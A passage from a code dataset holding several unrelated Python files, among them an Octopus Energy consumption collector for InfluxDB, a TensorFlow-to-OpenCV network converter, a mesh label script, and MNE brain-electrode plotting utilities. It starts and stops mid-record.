MessagingResult([parameters.get_application_message_id()])\n return result\n","repo_name":"DKE-Data/agrirouter-sdk-python","sub_path":"agrirouter/messaging/services/commons.py","file_name":"commons.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42534609274","text":"from datetime import datetime, timedelta\nfrom urllib import parse\n\nfrom dateutil import parser\nfrom requests import get\n\nfrom RPC.helper import Configurable, WithInfluxDB, WithLogging\n\n\nclass Octopussy(WithInfluxDB, WithLogging, Configurable):\n dt_from = datetime.now() - timedelta(days=30)\n dt_to = datetime.now()\n app_config = {\n \"cron_octopus_period\": int,\n \"cron_octopus_apinum\": 1000,\n \"octopus_apikey\": str,\n \"octopus_elecsn\": str,\n \"octopus_gassn\": str,\n \"octopus_gasfac\": float(0),\n \"octopus_mpan\": str,\n \"octopus_mprn\": str,\n }\n\n uris = {\n \"electricity\": [\n \"https://api.octopus.energy/v1/electricity-meter-points/%s/meters/%s/consumption/\",\n \"octopus_mpan\",\n \"octopus_elecsn\",\n ],\n \"gas\": [\n \"https://api.octopus.energy/v1/gas-meter-points/%s/meters/%s/consumption/\",\n \"octopus_mprn\",\n \"octopus_gassn\",\n ],\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, ctx=\"vnd.Octopussy\", dbvar=\"octopus_db\", **kwargs)\n\n def load_series(self, uri, dt_from=None, dt_to=None, page=None):\n \"\"\"\n Fetch all datapoints from Octopus, using recursion to handle pagination\n \"\"\"\n params = {\n \"period_from\": dt_from if dt_from else self.dt_from,\n \"period_to\": dt_to if dt_to else self.dt_to,\n \"page_size\": self.app_config.get(\"cron_octopus_apinum\"),\n }\n if page is not None:\n params[\"page\"] = page\n resp = get(uri, params=params, auth=(self.app_config.get(\"octopus_apikey\"), \"\"))\n resp.raise_for_status()\n res = resp.json()\n ret = res.get(\"results\", [])\n self.log.info(\n f\"Got {len(ret)} result(s) for range {dt_from} to {dt_to} (page {page})\",\n )\n if res[\"next\"]:\n p_next = parse.urlparse(res[\"next\"]).query\n ret += self.load_series(\n uri, dt_from, dt_to, page=parse.parse_qs(p_next)[\"page\"][0]\n )\n return ret\n\n def load_dt(self, series):\n \"\"\"\n Load the most recent datapoint for the given series from InfluxDB.\n If the most recent datapoint is not available or the series is formed differently,\n the series will be completely discarded and the default from date will be used.\n \"\"\"\n dt_from = self.dt_from\n dt_to = self.dt_to\n resp = self.db.query(\n f\"SELECT time, raw_consumption FROM {series} ORDER BY time DESC LIMIT 1\"\n )\n if (\n not self.app_config.get(\"db_influx_reset_db_contents\", False)\n and \"series\" in resp.raw\n and \"values\" in resp.raw[\"series\"][0]\n and len(resp.raw[\"series\"][0][\"values\"]) > 0\n ):\n dt_from = resp.raw[\"series\"][0][\"values\"][0][0]\n self.log.info(f\"Newest data for {series} from {dt_from}.\")\n else:\n if self.app_config.get(\"db_influx_reset_db_contents\", False):\n self.log.warning(\n f\"Resetting data for {series}, as the reset flag was set\",\n )\n else:\n self.log.warning(\n f\"Unable to get last entry timestamp for {series} - resetting.\",\n )\n self.db.query(f\"DROP SERIES FROM {series}\")\n return dt_from, dt_to\n\n def put_metrics(self, series, metrics):\n def _fields(measurement, factor):\n ret = {\n \"raw_consumption\": measurement[\"consumption\"],\n }\n if factor not in (None, float(0)) and series == \"gas\":\n ret[\"factor\"] = factor\n return ret\n\n def _tags(measurement):\n dt_now = parser.isoparse(measurement[\"interval_end\"])\n return {\n \"time_of_day\": dt_now.strftime(\"%H:%M\"),\n \"date\": dt_now.strftime(\"%d/%m/%Y\"),\n }\n\n measurements = [\n {\n \"measurement\": series,\n \"tags\": _tags(measurement),\n \"time\": measurement[\"interval_end\"],\n \"fields\": _fields(measurement, self.app_config.get(\"octopus_gasfac\")),\n }\n for measurement in metrics\n ]\n self.db.write_points(measurements)\n\n def process(self, series):\n self.put_metrics(\n series,\n self.load_series(\n self.uris[series][0]\n % (\n self.app_config.get(self.uris[series][1]),\n self.app_config.get(self.uris[series][2]),\n ),\n *self.load_dt(series),\n ),\n )\n\n\np_cls = Octopussy\n","repo_name":"Maffsie/rpc-app","sub_path":"RPC/provider/octopus.py","file_name":"octopus.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16370165637","text":"from tasks.google_search import GoogleSearch\n\ndef test_search_5():\n\n _word_search = \"github\"\n test = GoogleSearch()\n results = test.search()\n\n for result in results:\n assert _word_search in result.lower()\n\ntest_search_5()\n","repo_name":"MarcoRiosG/pruebasSelenium","sub_path":"tests/test_res_google.py","file_name":"test_res_google.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74125254226","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\n\nimport numpy as np\nimport xml.etree.ElementTree as et\nfrom tensorflow.python import pywrap_tensorflow\n\nsize_map = dict(conv2d=(80, 80, 3), conv2d_1=(40, 40, 32), conv2d_2=(20, 20, 64))\n\n\n# kernel \\in R^{width height channels filters}\ndef conv2dense(kernel, bias, input_size, stride):\n input_size_flat = input_size[0] * input_size[1] * input_size[2]\n output_size_flat = (input_size[0] // stride) * (input_size[1] // stride) * kernel.shape[3]\n weights = np.zeros((input_size_flat, output_size_flat))\n\n for f in range(0, kernel.shape[2]):\n for chi in range(0, input_size[0], stride):\n for upsilon in range(0, input_size[1], stride):\n kx = (kernel.shape[0] - 1) // 2\n ky = (kernel.shape[1] - 1) // 2\n w = np.zeros((input_size[0] // stride, input_size[1] // stride, kernel.shape[3]))\n for c in range(0, kernel.shape[2]):\n for x in range(-kx, kx):\n for y in range(-ky, ky):\n ix = chi // stride + x\n iy = upsilon // stride + y\n if 0 <= ix < w.shape[0] and 0 <= iy < w.shape[1]:\n w[ix][iy][c] = kernel[x + kx][y + ky][c][f]\n w_flat = np.reshape(w, -1)\n index = f * input_size[0] * input_size[1] + chi * input_size[1] + upsilon\n weights[index] = w_flat\n\n bias_vect = np.zeros(output_size_flat)\n per_bias_count = (input_size[0] // stride) * (input_size[1] // stride)\n for i in range(0, bias.shape[0]):\n for c in range(0, per_bias_count):\n bias_vect[c + i * per_bias_count] = bias[i]\n\n return weights, bias_vect\n\n\ndef get_order(layers_map):\n print(\"Retrieving order...\")\n ret = list()\n for key in sorted(layers_map):\n ret.append(layers_map[key])\n print(\"...finished!\")\n return ret\n\n\ndef map_layers(matrixes):\n print(\"Mapping layers...\")\n num_of_layers = int(len(matrixes) / 2)\n print(\"Assuming that the net consists of %d layers\" % num_of_layers)\n layer_names = set()\n for name, _ in matrixes.items():\n layer_name = name.split(\"/\", 1)[0]\n layer_names.add(layer_name)\n\n weights_cnn = 0\n weights_mlp = 0\n\n layers_map = dict()\n for layer_name in layer_names:\n kernel = matrixes[layer_name + \"/kernel\"]\n bias = matrixes[layer_name + \"/bias\"]\n\n if \"conv\" in layer_name:\n weights_for_kernel = 1\n weights_for_bias = 1\n for s in kernel.shape:\n weights_for_kernel *= s\n for s in bias.shape:\n weights_for_bias *= s\n weights_cnn += weights_for_bias + weights_for_kernel\n\n kernel, bias = conv2dense(kernel, bias, size_map[layer_name], 3)\n\n weights_for_kernel = 1\n weights_for_bias = 1\n for s in kernel.shape:\n weights_for_kernel *= s\n for s in bias.shape:\n weights_for_bias *= s\n weights_mlp += weights_for_bias + weights_for_kernel\n\n layers_map[layer_name] = (kernel, bias)\n\n print(\"Weights CNN: %d\\tWeights MLP: %d\" % (weights_cnn, weights_mlp))\n print(\"...finished!\")\n return get_order(layers_map)\n\n\ndef save_to_opencv(layers):\n print(\"Saving to opencv...\")\n layer_sizes_text = \"\"\n input_scale_text = \"\"\n output_scale_text = \"\"\n\n output_size = layers[len(layers) - 1][0].shape[1]\n input_size = layers[0][0].shape[0]\n\n for c in range(0, len(layers)):\n weight, bias = layers[c]\n layer_sizes_text += str(weight.shape[0]) + \" \"\n\n layer_sizes_text += str(output_size)\n\n for _ in range(0, input_size):\n input_scale_text += \"1. 0. \"\n\n for _ in range(0, output_size):\n output_scale_text += \"1. 0. \"\n\n print(\"...building xml...\")\n root = et.Element(\"opencv_storage\")\n mlp = et.SubElement(root, \"opencv_ml_ann_mlp\")\n format = et.SubElement(mlp, \"format\")\n layer_sizes = et.SubElement(mlp, \"layer_sizes\")\n activation_function = et.SubElement(mlp, \"activation_function\")\n f_param1 = et.SubElement(mlp, \"f_param1\")\n f_param2 = et.SubElement(mlp, \"f_param2\")\n min_val = et.SubElement(mlp, \"min_val\")\n max_val = et.SubElement(mlp, \"max_val\")\n min_val1 = et.SubElement(mlp, \"min_val1\")\n max_val1 = et.SubElement(mlp, \"max_val1\")\n training_params = et.SubElement(mlp, \"training_params\")\n train_method = et.SubElement(training_params, \"train_method\")\n dw_scale = et.SubElement(training_params, \"dw_scale\")\n moment_scale = et.SubElement(training_params, \"moment_scale\")\n term_criteria = et.SubElement(training_params, \"term_criteria\")\n epsilon = et.SubElement(term_criteria, \"epsilon\")\n iterations = et.SubElement(term_criteria, \"iterations\")\n input_scale = et.SubElement(mlp, \"input_scale\")\n output_scale = et.SubElement(mlp, \"output_scale\")\n inv_output_scale = et.SubElement(mlp, \"inv_output_scale\")\n weights = et.SubElement(mlp, \"weights\")\n layer_weights = list()\n for _ in layers:\n layer_weights.append(et.SubElement(weights, \"_\"))\n\n format.text = \"3\" # OpenCv Version 2 or 3, 4 is treated as 3\n layer_sizes.text = layer_sizes_text\n activation_function.text = \"SIGMOID_SYM\" # Sigmoid, which is actually tanh\n f_param1.text = \"1\" # Use a normalied opencv-sigmoid which is tanh(x/2)\n f_param2.text = \"1\"\n min_val.text = \"0.\"\n max_val.text = \"0.\"\n min_val1.text = \"0.\"\n max_val1.text = \"0.\"\n train_method.text = \"BACKPROP\"\n dw_scale.text = \"1.0e-03\"\n moment_scale.text = \"0.\"\n epsilon.text = \"1.0e-02\"\n iterations.text = \"1000\"\n input_scale.text = input_scale_text\n output_scale.text = output_scale_text\n inv_output_scale.text = output_scale_text\n\n for c in range(0, len(layers)):\n layer_weights[c].text = \"__SPLIT__\"\n\n print(\"...splitting...\")\n xml_str = et.tostring(root, encoding='utf8', method='xml')\n parts = str(xml_str).split(\"__SPLIT__\")\n for c in range(0, len(parts)):\n file = open(\"part_%02d.xml\" % (c * 2), \"w\")\n file.write(parts[c])\n file.close()\n\n print(\"...writing matrices...\")\n for c in range(0, len(layers)):\n weight, bias = layers[c]\n homogeneous = np.concatenate((weight, [bias]), axis=0)\n flattened = homogeneous.flatten('A')\n\n print(\"w\")\n file = open(\"part_%02d.xml\" % (c * 2 + 1), \"w\")\n for w in flattened:\n file.write(\"%d \" % w)\n file.close()\n\n print(\"...finished!\")\n\n\ndef main():\n if len(sys.arg) != 2:\n print(\"usage: main.py model.ckpt\")\n exit(1)\n\n checkpoint_file = sys.argv[1]\n\n reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_file)\n\n var_to_shape_map = reader.get_variable_to_shape_map()\n weights = dict()\n for key in sorted(var_to_shape_map):\n weights[key] = reader.get_tensor(key)\n layers = map_layers(weights)\n save_to_opencv(layers)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aul12/Cnn2Mlp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7474155404","text":"from os import walk\nimport re\nimport os\nimport shutil\nimport math\n\nedges_path = \"E:/Uni_Projects/3DMeshes/2020_ProjectMeshPreparation/small_meshes/proc\"\n_, _, filenames = next(walk(edges_path))\n\nfor name in filenames:\n if not '.edges' in name:\n continue\n \n wo_ext = re.sub(\"\\.edges\", \"\", name)\n print(wo_ext)\n \n file = open(name, 'r')\n lines = file.readlines()\n print(len(lines))\n file.close()\n \n eseg_file = wo_ext + \".eseg\"\n print(eseg_file)\n \n mid = math.floor(len(lines)/2)\n \n new_file = open(eseg_file, 'w+')\n for i in range(0, mid, 1):\n new_file.write(\"0\\n\")\n for i in range(mid, len(lines), 1):\n new_file.write(\"1\\n\")\n new_file.close()\n","repo_name":"vijusudhi/Preprocessing3DMeshes","sub_path":"batch_2/edges/tweak_edges.py","file_name":"tweak_edges.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70873920145","text":"import csv\nimport os.path as op\nfrom collections import OrderedDict\nfrom collections.abc import Iterable\nfrom functools import singledispatch\nimport mne\nimport nibabel as nib\nimport numpy as np\nfrom mne.viz import Brain\n\nfrom ieeg import PathLike, Signal\nfrom ieeg.io import get_elec_volume_labels\nfrom ieeg.viz import _qt_backend\n\n_qt_backend()\n\nimport matplotlib # noqa: E402\nimport matplotlib.patheffects as path_effects # noqa: E402\nimport matplotlib.pyplot as plt # noqa: E402\n\n\ndef plot_overlay(image: nib.Nifti1Image, compare: nib.Nifti1Image,\n title: str, thresh: float = None):\n \"\"\"Plots an overlay of two images\n\n Parameters\n ----------\n image : nib.Nifti1Image\n The image to plot\n compare : nib.Nifti1Image\n The image to overlay\n title : str\n The title of the plot\n thresh : float, optional\n The threshold to apply to the overlay, by default None\n \"\"\"\n image = nib.orientations.apply_orientation(\n np.asarray(image.dataobj), nib.orientations.axcodes2ornt(\n nib.orientations.aff2axcodes(image.affine))).astype(np.float32)\n compare = nib.orientations.apply_orientation(\n np.asarray(compare.dataobj), nib.orientations.axcodes2ornt(\n nib.orientations.aff2axcodes(compare.affine))).astype(np.float32)\n if thresh is not None:\n compare[compare < np.quantile(compare, thresh)] = np.nan\n fig, axes = plt.subplots(1, 3, figsize=(12, 4))\n fig.suptitle(title)\n for i, ax in enumerate(axes):\n ax.imshow(np.take(image, [image.shape[i] // 2], axis=i).squeeze().T,\n cmap='gray')\n ax.imshow(np.take(compare, [compare.shape[i] // 2],\n axis=i).squeeze().T, cmap='gist_heat', alpha=0.5)\n ax.invert_yaxis()\n ax.axis('off')\n fig.tight_layout()\n\n\ndef allign_CT(t1_path: PathLike, ct_path: PathLike, reg_affine=None\n ) -> nib.spatialimages.SpatialImage:\n \"\"\"Alligns a CT scan to a T1 scan\n\n Parameters\n ----------\n t1_path : PathLike\n The path to the T1 scan\n ct_path : PathLike\n The path to the CT scan\n reg_affine : np.ndarray, optional\n The affine to use for registration, by default None\n\n Returns\n -------\n nib.spatialimages.SpatialImage\n The alligned CT scan\n \"\"\"\n T1 = nib.load(t1_path)\n CT_orig = nib.load(ct_path)\n sdr_morph = None\n if reg_affine is None:\n reg_affine, sdr_morph = mne.transforms.compute_volume_registration(\n CT_orig, T1, pipeline='all')\n CT_aligned = mne.transforms.apply_volume_registration(CT_orig, T1,\n reg_affine,\n sdr_morph)\n return CT_aligned\n\n\ndef show_brain(my_raw: Signal, trans: mne.transforms.Transform,\n sub_id: PathLike, subjects_dir: PathLike = None,\n overwrite: bool = False):\n \"\"\"Shows the brain with the electrodes projected onto it\n\n Parameters\n ----------\n my_raw : Signal\n The data to plot\n trans : mne.transforms.Transform\n The transformation to use\n sub_id : PathLike\n The subject id\n subjects_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon_Full'\n overwrite : bool, optional\n Whether to overwrite the watershed bem, by default False\n \"\"\"\n subjects_dir = get_sub_dir(subjects_dir)\n try:\n mne.bem.make_watershed_bem(sub_id, subjects_dir, overwrite=overwrite)\n except RuntimeError:\n pass\n my_raw.info = mne.preprocessing.ieeg.project_sensors_onto_brain(\n my_raw.info, trans, sub_id, subjects_dir=subjects_dir)\n brain_kwargs = dict(cortex='low_contrast', alpha=0.2, background='white')\n brain = mne.viz.Brain(sub_id, surf='white', subjects_dir=subjects_dir,\n title='Projection', **brain_kwargs)\n brain.add_sensors(my_raw.info, trans=trans)\n view_kwargs = dict(azimuth=60, elevation=100, distance=350,\n focalpoint=(0, 0, -15))\n brain.show_view(**view_kwargs)\n\n\ndef imshow_mri(data, img: nib.spatialimages.SpatialImage,\n vox: tuple[int, int, int], xyz: dict, suptitle: str = \"\"):\n \"\"\"Show an MRI slice with a voxel annotated.\n\n Parameters\n ----------\n data : np.ndarray\n The data to plot\n img : nib.spatialimages.SpatialImage\n The image to plot\n vox : tuple[int, int, int]\n The voxel to annotate\n xyz : dict\n The xyz coordinates of the voxel\n suptitle : str, optional\n The title of the plot, by default \"\"\n\n Returns\n -------\n fig, ax : matplotlib.pyplot.Figure, matplotlib.pyplot.Axes\n The figure and axes of the plot\n \"\"\"\n i, j, k = vox\n fig, ax = plt.subplots(1, figsize=(6, 6))\n codes = nib.orientations.aff2axcodes(img.affine)\n # Figure out the title based on the code of this axis\n ori_slice = dict(\n P=\"Coronal\", A=\"Coronal\", I=\"Axial\", S=\"Axial\", L=\"Sagittal\",\n R=\"Sagittal\"\n )\n ori_names = dict(\n P=\"posterior\", A=\"anterior\", I=\"inferior\", S=\"superior\", L=\"left\",\n R=\"right\"\n )\n title = ori_slice[codes[0]]\n ax.imshow(data[i], vmin=10, vmax=120, cmap=\"gray\", origin=\"lower\")\n ax.axvline(k, color=\"y\")\n ax.axhline(j, color=\"y\")\n for kind, coords in xyz.items():\n annotation = \"{}: {}, {}, {} mm\".format(kind,\n *np.round(coords).astype(int))\n text = ax.text(k, j, annotation, va=\"baseline\", ha=\"right\",\n color=(1, 1, 0.7))\n text.set_path_effects(\n [\n path_effects.Stroke(linewidth=2, foreground=\"black\"),\n path_effects.Normal(),\n ]\n )\n # reorient view so that RAS is always rightward and upward\n x_order = -1 if codes[2] in \"LIP\" else 1\n y_order = -1 if codes[1] in \"LIP\" else 1\n ax.set(\n xlim=[0, data.shape[2] - 1][::x_order],\n ylim=[0, data.shape[1] - 1][::y_order],\n xlabel=f\"k ({ori_names[codes[2]]}+)\",\n ylabel=f\"j ({ori_names[codes[1]]}+)\",\n title=f\"{title} view: i={i} ({ori_names[codes[0]]}+)\",\n )\n fig.suptitle(suptitle)\n fig.subplots_adjust(0.1, 0.1, 0.95, 0.85)\n return fig\n\n\ndef get_sub_dir(subj_dir: PathLike = None):\n \"\"\"Gets the subjects directory\n\n Parameters\n ----------\n subj_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon_Full'\n\n Returns\n -------\n PathLike\n The subjects directory\n \"\"\"\n if subj_dir is None:\n from os import path\n HOME = path.expanduser(\"~\")\n subj_dir = op.join(HOME, \"Box\", \"ECoG_Recon\")\n return subj_dir\n\n\ndef plot_gamma(evoked: mne.Evoked, subjects_dir: PathLike = None, **kwargs):\n \"\"\"Plots the gamma power over time\n\n Parameters\n ----------\n evoked : mne.Evoked\n The data to plot\n subjects_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon_Full'\n **kwargs\n Additional arguments to pass to plot_on_average\n \"\"\"\n data = evoked.copy().filter(30, 150).apply_hilbert(envelope=True)._data\n fig = plot_on_average(evoked.info, subjects_dir=subjects_dir, **kwargs)\n mne.viz.set_3d_view(fig, azimuth=0, elevation=70)\n\n xy, im = mne.viz.snapshot_brain_montage(fig, evoked.info)\n # convert from a dictionary to array to plot\n xy_pts = np.vstack([xy[ch] for ch in evoked.info['ch_names']])\n\n # get a colormap to color nearby points similar colors\n cmap = matplotlib.cm.get_cmap('viridis')\n\n # create the figure of the brain with the electrode positions\n fig, ax = plt.subplots(figsize=(5, 5))\n ax.set_title('Gamma power over time', size='large')\n ax.imshow(im)\n ax.set_axis_off()\n\n # normalize gamma power for plotting\n gamma_power = -100 * data / data.max()\n # add the time course overlaid on the positions\n x_line = np.linspace(-0.025 * im.shape[0], 0.025 * im.shape[0],\n data.shape[1])\n for i, pos in enumerate(xy_pts):\n x, y = pos\n color = cmap(i / xy_pts.shape[0])\n ax.plot(x_line + x, gamma_power[i] + y, linewidth=0.5, color=color)\n\n\ndef plot_on_average(sigs: Signal | str | list[Signal | str, ...],\n subj_dir: PathLike = None, rm_wm: bool = True,\n picks: list[int | str, ...] = None, surface: str = 'pial',\n hemi: str = 'split', color: matplotlib.colors = (1, 1, 1),\n size: float = 0.35, fig: Brain = None,\n background: str = 'white') -> Brain:\n \"\"\"Plots the signal on the average brain\n\n Takes a signal instance or list of signal instances and plots them on the\n fsaverage brain.\n\n Parameters\n ----------\n sigs : Union[Signal, list[Signal]]\n The signal(s) to plot\n subj_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon'\n rm_wm : bool, optional\n Whether to remove white matter electrodes, by default True\n picks : list[int | str], optional\n The channels to plot, by default None\n surface : str, optional\n The surface to plot on, by default 'pial'\n hemi : str, optional\n The hemisphere to plot, by default 'split'\n color : matplotlib.colors, optional\n The color to plot, by default (1, 1, 1)\n size : float, optional\n The size of the markers, by default 0.35\n fig : Brain, optional\n The figure to plot on, by default None\n background: str, optional\n Background color\n\n Returns\n -------\n Brain\n The figure brain object\n \"\"\"\n\n subj_dir = get_sub_dir(subj_dir)\n if fig is None:\n fig = Brain('fsaverage', subjects_dir=subj_dir, cortex='low_contrast',\n alpha=0.6, background=background, surf=surface, hemi=hemi)\n\n if isinstance(sigs, (Signal, mne.Info)):\n sigs = [sigs]\n if isinstance(sigs, Iterable):\n sigs = {get_sub(v): v for v in sigs}\n\n for subj, inst in sigs.items():\n\n if isinstance(inst, mne.Info):\n new = inst.copy()\n elif isinstance(inst, Signal):\n new = inst.info.copy()\n elif isinstance(inst, str):\n new = subject_to_info(subj)\n new['subject_info'] = dict(his_id=f\"sub-{inst}\")\n else:\n raise TypeError(type(inst))\n\n to_fsaverage = mne.read_talxfm(subj, subj_dir)\n to_fsaverage = mne.transforms.Transform(fro='head', to='mri',\n trans=to_fsaverage['trans'])\n\n these_picks = range(len(new.ch_names))\n if isinstance(picks, Iterable):\n if len(picks) == 0:\n continue\n elif isinstance(picks[0], int):\n these_picks = [new.ch_names[pick] for pick in these_picks if\n pick in picks]\n picks = [p - len(new.ch_names) for p in\n picks[len(these_picks):]]\n elif isinstance(picks[0], str):\n these_picks = [s[6:] for s in picks if s[:5] in\n new['subject_info']['his_id']]\n elif picks is not None:\n raise TypeError(picks)\n\n if len(these_picks) == 0:\n continue\n\n if rm_wm:\n these_picks = pick_no_wm(these_picks, gen_labels(\n new, subj, subj_dir, new.ch_names))\n\n if len(these_picks) == 0:\n continue\n\n # plot the data\n plot_subj(new, subj_dir, these_picks, False, fig=fig,\n trans=to_fsaverage, color=color, size=size,\n labels_every=None, hemi=hemi, background=background)\n\n return fig\n\n\ndef pick_no_wm(picks: list[str], labels: OrderedDict[str: str]):\n \"\"\"Picks the channels that are not in the white matter\n\n Parameters\n ----------\n picks : list[str | int]\n The channels to pick from\n labels : dict[str | int, list[str]]\n The labels for each channel\n\n Returns\n -------\n list[str | int]\n The channels that are not in the white matter\n \"\"\"\n bad_words = ('Unknown', 'unknown', 'hypointensities', 'White-Matter')\n\n # remove corresponding picks with either 'White-Matter' in the left most\n # entry or empty lists\n if isinstance(picks[0], int):\n picks = [list(labels.keys())[p] for p in picks]\n picks = [p for p in picks if not any(w in labels[p] for w in bad_words)]\n return picks\n\n\ndef get_sub(inst: Signal | mne.Info | str) -> str:\n \"\"\"Gets the subject from the instance\n\n Parameters\n ----------\n inst : Signal\n The instance to get the subject from\n\n Returns\n -------\n str\n The subject\"\"\"\n if isinstance(inst, Signal):\n inst = inst.info\n elif isinstance(inst, str):\n return f\"{inst[0]}{int(inst[1:])}\"\n out_str = inst['subject_info']['his_id'][4:]\n if len(out_str) == 1:\n return out_str\n return out_str[0] + str(int(out_str[1:]))\n\n\ndef plot_subj(inst: Signal | mne.Info | str, subj_dir: PathLike = None,\n picks: list[str | int] = None, no_wm: bool = False,\n labels_every: int | None = 8, surface: str = 'pial',\n hemi: str = 'both', fig: Brain = None,\n trans=None, color: matplotlib.colors = (1, 1, 1),\n size: float = 0.35, show: bool = True, background: str = 'white', title: str = None\n ) -> Brain:\n \"\"\"Plots the electrodes on the subject's brain\n\n Parameters\n ----------\n inst : Signal | mne.Info | str\n The subject to plot\n subj_dir : PathLike, optional\n The subjects directory, by default HOME / 'Box' / 'ECoG_Recon'\n picks : list[str | int], optional\n The channels to plot, by default all\n no_wm : bool, optional\n Whether to remove the white matter channels, by default False\n labels_every : int, optional\n How often to label the channels, by default 8\n fig : Brain, optional\n The figure to plot on, by default None\n surface : str, optional\n The surface to plot, by default 'pial'\n hemi : str, optional\n The hemisphere to plot, by default 'split'\n trans: mne.transforms.Transform, optional\n The transformation to apply, by default None\n color : matplotlib.colors, optional\n The color of the electrodes, by default (1,1,1)\n size : float, optional\n The size of the electrodes, by default 0.35\n show : bool, optional\n Whether to show the figure, by default True\n background: str, optional\n Background color\n title : string, optional\n Title the plot\n\n Returns\n -------\n Brain\n The brain plot\n \"\"\"\n if isinstance(inst, Signal):\n info = inst.info\n sub = get_sub(info)\n elif isinstance(inst, mne.Info):\n info = inst\n sub = get_sub(info)\n elif isinstance(inst, str):\n info = subject_to_info(inst, subj_dir)\n sub = inst\n else:\n raise TypeError(\n f\"inst must be Signal, mne.Info, or str, not {type(inst)}\")\n\n if subj_dir is None:\n subj_dir = get_sub_dir(subj_dir)\n if trans is None:\n trans = mne.transforms.Transform(fro='head', to='mri')\n if fig is None:\n fig = Brain(sub, subjects_dir=subj_dir, cortex='low_contrast',\n alpha=0.5, background=background, surf=surface, hemi=hemi,\n show=show)\n \n # Set the title if provided\n if title is not None:\n mne.viz.set_3d_title(fig, title, size=40)\n\n if picks is None:\n picks = info.ch_names\n if no_wm:\n picks = pick_no_wm(picks,\n gen_labels(info, sub, subj_dir, info.ch_names))\n if isinstance(picks[0], str):\n picks = mne.pick_channels(info.ch_names, picks)\n\n info: mne.Info = mne.pick_info(info, picks)\n\n # fig.add_sensors(info, trans)\n montage = info.get_montage()\n force2frame(montage, trans.from_str)\n montage.apply_trans(trans)\n pos = {k: v * 1000 for k, v in montage.get_positions()['ch_pos'].items()}\n\n # Default montage positions are in m, whereas plotting functions assume mm\n left = {k: p for k, p in pos.items() if k.startswith('L')}\n right = {k: p for k, p in pos.items() if k.startswith('R')}\n\n if left and hemi != 'rh':\n fig.add_foci(np.vstack(list(left.values())), hemi='lh', color=color,\n scale_factor=size)\n if right and hemi != 'lh':\n fig.add_foci(np.vstack(list(right.values())), hemi='rh', color=color,\n scale_factor=size)\n\n if labels_every is not None:\n settings = dict(shape=None, always_visible=True, text_color=(0, 0, 0),\n bold=False)\n _add_labels(fig, info, sub, labels_every, hemi,\n (left, right), **settings)\n\n return fig\n\n\ndef _add_labels(fig, info, sub, every, hemi, lr, **kwargs):\n names = info.ch_names[slice(every - 1, -1, every)]\n\n if not hemi == 'both':\n for hems, pos in enumerate(lr):\n if (not pos) or \\\n (hemi == 'lh' and hems == 1) or \\\n (hemi == 'rh' and hems == 0):\n continue\n\n plt_names = filter(lambda x: x.startswith(['L', 'R'][hems]), names)\n plt_names = [f'{sub}-{n}' for n in plt_names]\n positions = np.array([pos[n.split(\"-\")[1]] for n in plt_names])\n fig.plotter.subplot(0, hems)\n fig.plotter.add_point_labels(positions, plt_names, **kwargs)\n else:\n pos = {}\n for hem in lr:\n if hem:\n pos.update(hem)\n plt_names = [f'{sub}-{n}' for n in names]\n positions = np.array([pos[name] for name in names])\n fig.plotter.add_point_labels(positions, plt_names, **kwargs)\n\n\ndef subject_to_info(subject: str, subjects_dir: PathLike = None,\n ch_types: str = \"seeg\", sfreq: int = 2000) -> mne.Info:\n \"\"\"Gets the info for a subject from the subjects directory\n\n Parameters\n ----------\n subject : str\n The subject to get the info for\n subjects_dir : PathLike, optional\n The subjects directory, by default HOME / 'Box' / 'ECoG_Recon'\n ch_types : str, optional\n The channel type, by default \"seeg\"\n sfreq : int, optional\n The sampling frequency, by default 2000\n\n Returns\n -------\n mne.Info\n The info for the subject\n \"\"\"\n subjects_dir = get_sub_dir(subjects_dir)\n elec_file = op.join(subjects_dir, subject, 'elec_recon',\n subject + '_elec_locations_RAS_brainshifted.txt')\n elecs = dict()\n with open(elec_file, 'r') as fd:\n reader = csv.reader(fd)\n for row in reader:\n line = row[0].split(\" \")\n elecs[\"\".join(line[0:2])] = tuple(\n float(n) / 1000 for n in line[2:5])\n info = mne.create_info(list(elecs.keys()), sfreq, ch_types)\n montage = mne.channels.make_dig_montage(elecs, nasion=(0, 0, 0),\n coord_frame='ras')\n info.set_montage(montage)\n return info\n\n\n@singledispatch\ndef force2frame(montage: mne.channels.DigMontage, frame: str):\n \"\"\"Forces the montage to be in the specified frame\n\n Parameters\n ----------\n montage : mne.channels.DigMontage\n The montage to force\n frame : str, optional\n The frame to force to, by default 'mri'\n \"\"\"\n\n settings = dict(fro=montage.get_positions()['coord_frame'],\n to=frame, trans=np.eye(4))\n # current subjects are in 'mri' space, even though it says head\n if not settings['fro'] == frame:\n trans = mne.transforms.Transform(**settings)\n montage.apply_trans(trans)\n\n\n@force2frame.register\ndef _(info: mne.Info, frame: str):\n montage = info.get_montage()\n force2frame(montage, frame)\n info.set_montage(montage)\n\n\ndef gen_labels(info: mne.Info, sub: str = None, subj_dir: PathLike = None,\n picks: list[str] = None) -> OrderedDict[str, list[str]]:\n \"\"\"Generates the labels for the electrodes\n\n Parameters\n ----------\n info : mne.Info\n The subject to get the labels for\n subj_dir : PathLike, optional\n The subjects directory, by default None\n picks : list[str | int], optional\n The channels to plot, by default None\n\n Returns\n -------\n dict[str, list]\n The labels for the electrodes\n \"\"\"\n\n sub = get_sub(info) if sub is None else sub\n subj_dir = get_sub_dir(subj_dir)\n montage = info.get_montage()\n force2frame(montage, 'mri')\n # aseg = 